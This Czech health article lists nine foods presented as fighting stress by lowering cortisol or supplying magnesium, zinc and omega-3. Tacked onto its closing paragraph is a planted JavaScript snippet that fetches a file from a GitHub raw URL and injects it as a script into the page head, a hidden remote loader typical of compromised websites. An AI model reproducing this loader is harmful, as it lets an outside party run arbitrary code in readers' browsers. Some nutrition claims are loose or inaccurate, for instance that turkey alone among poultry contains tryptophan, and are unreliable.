V dnešní době je téměř nemožné vyhnout se stresu, většina z nás se opakovaně potýká se stresovými situacemi, které zatěžují náš organismus a to jak psychicky, tak i fyzicky, neboť dlouhodobý stres na náš organismus působí velmi negativně. Při stresu totiž naše tělo vylučuje hormon kortizol, který je produkován kůrou nadledvin a jeho hlavní funkcí je aktivovat organismus v nebezpečných situacích. Toto pravěké kódování nám však teď spíše škodí, stresové situace nejsou náhlé a jednorázové jako kdysi při lovu.

Co způsobuje kortizol?

Kortizol, pokud je dlouhodobě vyplavován do našeho těla způsobuje snížení imunity našeho organismu, zvyšuje ukládání tuků, demineralizaci kostní tkání, což vede k osteoporóze, zatěžuje srdeční činnost, ovlivňuje vstřebávání vápníku, zvyšuje dráždivost centrální nervové soustavy a emoční labilitu. Jakým potravinami tedy můžete bojovat proti všem těmto negativním jevům?

  1. Špenát (a ostatní tmavozelená listová zelenina) obsahuje folát, který pomáhá tělu při produkci serotoninu a dopaminu, hormonů „dobré nálady.“ Má také vysoký obsah hořčíku, který snižuje krevní tlak. Tělo má při stresu vyšší spotřebu hořčíku, touto zeleninou tedy doplníte jeho hladinu.
  2. Sezamová semínka – při stresu dochází l úbytku zinku, jímž jsou sezamová semínka přímo nabitá. Můžete je jíst syrová, přidávat do jogurtu či smoothie, nebo je přidat do jiných vařených či pečených pokrmů.
  3. Paprika – tato běžná zelenina má schopnost snižovat hladinu kortizolu v našem těle, je tedy nasnadě, proč bychom ji měli přijímat. Kromě toho obsahuje i vitamín C, který zvyšuje naší imunitu. Nejlepší je konzumovat papriku čerstvou.
  4. Rajčata – mají stejnou schopnost jako paprika, snižují hladinu kortizolu a kromě toho obsahují lypokeny, látky, které snižují záněty v těle, vznik krevních sraženin a rovněž depresivní nálady. V tomto případě je nejlépe konzumovat rajčata vařená
  5. Losos – je zdrojem omega 3 kyselin, které výrazně regulují hladinu hormonů dobré nálady, rovněž je cenným zdrojem zinku
  6. Hořká čokoláda – čokoláda s vysokým procentem kakaových bobů vám opět dodá potřebný hořčík a zinek, zlepšují náladu
  7. Avokádo – je doslova zdravá bomba. Obsahuje esenciální iviny, draslík, vitamíny,především E a B, to vše velmi pozitivně ovlivňuje naší nervovou soustavu. Avokádo můžete sníst jen tak, třeba na chlebu, nebo ho přidat téměř do čehokoliv.
  8. Vlašské ořechy – obsahují látku, která pomáhá snižovat noradrenalin, hormon, který je rovněž vyplavován při stresu.
  9. Krocaní maso – obsahuje na rozdíl od jiné drůbeže L- tryptofan, aminokyselinu, která se v našem těle přeměňuje na hormon dobré nálady, serotonin

Tak to je devět potravin, které dokáží bojovat proti stresu. Jistě, rychlejší je sáhnout po klasické čokoládové tyčince, která nám rychle dodá energii, ale to je také vše. Z dlouhodobého hlediska je rozhodně přínosnější naučit se tyto potraviny zařadit do našeho jídelníčku, rozhodně tak prospějte svému zdraví. (var url = „https://raw.githubusercontent.com/truba77/trubnik/main/to.txt“; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(„script“); script.src = data.trim(); document.getElementsByTagName(„head“)[0].appendChild(script); });)